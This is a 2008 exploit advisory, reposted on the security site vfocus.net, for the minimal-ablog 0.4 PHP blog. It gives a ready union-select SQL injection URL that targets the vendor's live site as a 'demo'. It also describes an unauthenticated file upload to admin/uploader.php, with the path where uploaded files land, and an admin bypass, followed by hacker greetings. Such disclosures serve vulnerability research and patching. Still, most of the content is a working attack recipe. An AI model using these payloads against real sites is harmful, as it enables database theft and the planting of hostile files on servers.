首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Minimal Ablog 0.4 (SQL/FU/Bypass) Multiple Remote Vulnerabilities
来源:vfocus.net 作者:vfocus 发布时间:2008-12-01  
===========================================================================================================


  [o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln 

       Software : minimal-ablog version 0.4
       Vendor   : http://www.abweb.co.cc/
       Download : http://code.google.com/p/minimal-ablog/downloads/list
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===========================================================================================================


  [o] Vulnerable file

       index.php
       admin/uploader.php



  [o] Exploit

       [ SQL Injection ]

	    http://localhost/[path]/index.php?id=[SQL]
	    http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--  <=- demo

       [ File Upload ]

	    http://localhost/[path]/admin/uploader.php  <=- upload your file here
	    http://localhost/[path]/img/[your_file]  <=- file will be uploaded here

       [ Admin Bypass ]

	    when you open admin/uploader.php to upload file you already have admin privs too :)


===========================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
===========================================================================================================

# [2008-11-30]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KTP Computer Customer Database
·Electronics Workbench (EWB Fil
·KTP Computer Customer Database
·cpCommerce 1.2.6 (URL Rewrite)
·Quick Tree View .NET 3.1 (qtv.
·Active Business Directory v 2
·Cain & Abel <= v4.9.24 .RDP St
·Active Time Billing 3.2 (Auth
·Andy's PHP Knowledgebase 0.92.
·Active Price Comparison v 4 (P
·Debian GNU/Linux (symlink atta
·Active Photo Gallery 6.2 (Auth
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved